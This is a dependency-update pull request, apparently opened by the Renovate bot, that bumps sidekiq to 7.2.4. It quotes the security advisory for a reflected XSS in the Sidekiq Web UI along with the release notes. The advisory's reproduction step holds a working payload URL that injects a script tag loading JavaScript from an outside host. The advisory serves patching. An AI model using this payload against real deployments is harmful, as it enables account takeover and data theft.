Skip to content

chore(deps): update dependency sidekiq to v7.2.4 [security]#108

Open
renovate[bot] wants to merge 1 commit intomasterfrom
renovate/rubygems-sidekiq-vulnerability
Open

chore(deps): update dependency sidekiq to v7.2.4 [security]#108
renovate[bot] wants to merge 1 commit intomasterfrom
renovate/rubygems-sidekiq-vulnerability

Conversation

@renovate
Copy link
Copy Markdown
Contributor

@renovate renovate bot commented Apr 26, 2024

This PR contains the following updates:

Package Change Age Confidence
sidekiq (source, changelog) 7.2.07.2.4 age confidence

GitHub Vulnerability Alerts

CVE-2024-32887

Description:

During the source Code Review of the metrics.erb view of the Sidekiq Web UI, A reflected XSS vulnerability is discovered. The value of substr parameter is reflected in the response without any encoding, allowing an attacker to inject Javascript code into the response of the application.

This vulnerability can be exploited to target the users of the application, and users of other applications deployed on the same domain or website as that of the Sidekiq website. Successful exploit results may result in compromise of user accounts and user data.

Impact:

The impact of this vulnerability can be severe. An attacker could exploit it to target users of the Sidekiq Web UI. Moreover, if other applications are deployed on the same domain or website as Sidekiq, users of those applications could also be affected, leading to a broader scope of compromise. Potentially compromising their accounts, forcing the users to perform sensitive actions, stealing sensitive data, performing CORS attacks, defacement of the web application, etc.

Mitigation:

Encode all output data before rendering it in the response to prevent XSS attacks.

Steps to Reproduce:

  1. Go to the following URL of the sidekiq Web UI:
    https://{host}/sidekiq/metrics?substr=beret%22%3E%3Cscript%20src=%22https://cheemahq.vercel.app/a.js%22%20/%3E
  2. XSS payload will be executed, causing a popup.

Evidence:

image
Figure 1: Source Code Vulnerable to XSS

image
Figure 2: XSS payload triggered


Release Notes

sidekiq/sidekiq (sidekiq)

v7.2.4

Compare Source

v7.2.3

Compare Source

  • Support Dragonfly.io as an alternative Redis implementation
  • Fix error unpacking some compressed error backtraces [#​6241]
  • Fix potential heartbeat data leak [#​6227]
  • Add ability to find a currently running work by jid [#​6212, fatkodima]

v7.2.2

Compare Source

  • Add Process.warmup call in Ruby 3.3+
  • Batch jobs now skip transactional push [#​6160]

v7.2.1

Compare Source

  • Add Sidekiq::Work type which replaces the raw Hash as the third parameter in
    Sidekiq::WorkSet#each { |pid, tid, hash| ... } [#​6145]
  • DEPRECATED: direct access to the attributes within the hash block parameter above.
    The Sidekiq::Work instance contains accessor methods to get at the same data, e.g.
work["queue"] # Old
work.queue # New
  • Fix Ruby 3.3 warnings around base64 gem [#​6151, earlopain]

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate bot force-pushed the renovate/rubygems-sidekiq-vulnerability branch from 50dbc9a to 3301543 Compare November 3, 2024 10:44
@renovate renovate bot force-pushed the renovate/rubygems-sidekiq-vulnerability branch from 3301543 to d7472cd Compare January 23, 2025 20:42
@renovate renovate bot force-pushed the renovate/rubygems-sidekiq-vulnerability branch from d7472cd to c2ddab5 Compare August 10, 2025 13:01
@renovate renovate bot force-pushed the renovate/rubygems-sidekiq-vulnerability branch from c2ddab5 to 345afe2 Compare September 25, 2025 19:31
@renovate renovate bot force-pushed the renovate/rubygems-sidekiq-vulnerability branch from 345afe2 to 10d4159 Compare November 18, 2025 12:58
@renovate renovate bot force-pushed the renovate/rubygems-sidekiq-vulnerability branch from 10d4159 to cd3de2e Compare March 13, 2026 12:03
@renovate renovate bot changed the title chore(deps): update dependency sidekiq to v7.2.4 [security] chore(deps): update dependency sidekiq to v7.2.4 [security] - autoclosed Mar 27, 2026
@renovate renovate bot closed this Mar 27, 2026
@renovate renovate bot deleted the renovate/rubygems-sidekiq-vulnerability branch March 27, 2026 01:51
@renovate renovate bot changed the title chore(deps): update dependency sidekiq to v7.2.4 [security] - autoclosed chore(deps): update dependency sidekiq to v7.2.4 [security] Mar 30, 2026
@renovate renovate bot reopened this Mar 30, 2026
@renovate renovate bot force-pushed the renovate/rubygems-sidekiq-vulnerability branch 2 times, most recently from cd3de2e to 495e2fd Compare March 30, 2026 21:57
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants